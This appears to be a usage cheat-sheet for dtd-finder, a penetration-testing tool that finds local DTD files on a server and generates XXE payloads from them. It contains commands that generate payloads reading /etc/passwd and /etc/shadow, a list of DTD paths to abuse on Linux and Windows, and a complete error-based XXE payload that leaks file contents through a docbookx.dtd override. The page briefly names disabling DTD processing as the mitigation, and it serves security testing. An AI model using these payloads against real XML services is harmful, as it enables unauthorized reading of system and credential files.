Description
dtd-finder discovers local DTD files on the target server and generates XXE payloads that leverage those DTDs. Because the referenced DTD already lives on the server's filesystem, nothing has to be fetched over the network, so the technique sidesteps defenses that rely only on blocking outbound connections; it does not work when the parser has DTD processing or external-entity resolution disabled, which remains the effective mitigation.
Installation
BASH
# Clone the repository; the tool itself runs as a Java JAR (dtd-finder.jar in
# the examples below), and a pre-built JAR is published on the project's
# GitHub releases page, so no build step is shown here.
git clone https://github.com/GoSecure/dtd-finder.git
cd dtd-finder
# Download the pre-built JAR from the project's releases page; the later
# commands reference it as dtd-finder.jar relative to the working directory
Basic Usage
BASH
# List the DTDs dtd-finder knows about beneath /usr/share/, a common DTD
# location on Linux (see the "Common Local DTDs" paths further down).
# NOTE(review): the path is scanned on the machine running the JAR -- presumably
# a reference system or filesystem copy resembling the target; confirm against
# the tool's README.
java -jar dtd-finder.jar /usr/share/
# Same scan, but additionally emit XXE payloads built on the DTDs found (--xxe)
java -jar dtd-finder.jar /usr/share/ --xxe
Advanced Usage
BASH
# Generate payloads that read one specific file, named with --file (here /etc/passwd)
java -jar dtd-finder.jar /usr/share/ --xxe --file /etc/passwd
# Restrict the scan to a single DTD location (/usr/share/xml/); the argument is
# a directory rather than one DTD file, so any DTDs beneath it are presumably
# candidates
java -jar dtd-finder.jar /usr/share/xml/ --xxe --file /etc/shadow
Common Local DTDs
XML
<!-- Common DTD paths on Linux -->
/usr/share/yelp/dtd/docbookx.dtd
/usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd
/usr/share/sgml/dtd/xml-core/catalog.dtd
<!-- Common DTD paths on Windows -->
C:\Windows\System32\wbem\xml\cim20.dtd
C:\Windows\System32\wbem\xml\wmi20.dtd
<!-- XXE using local DTD override -->
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
'>
%local_dtd;
]>
Common Workflows
BASH
# Step 1: Scan from the filesystem root (/) and emit payloads that read
#         /etc/passwd, a world-readable file commonly used to confirm that the
#         read works
java -jar dtd-finder.jar / --xxe --file /etc/passwd
# Step 2: Submit the generated payloads to the XML endpoint under test
# Step 3: Check for error-based exfiltration via the local DTD override
#         (the payload shape is shown under "Common Local DTDs" above)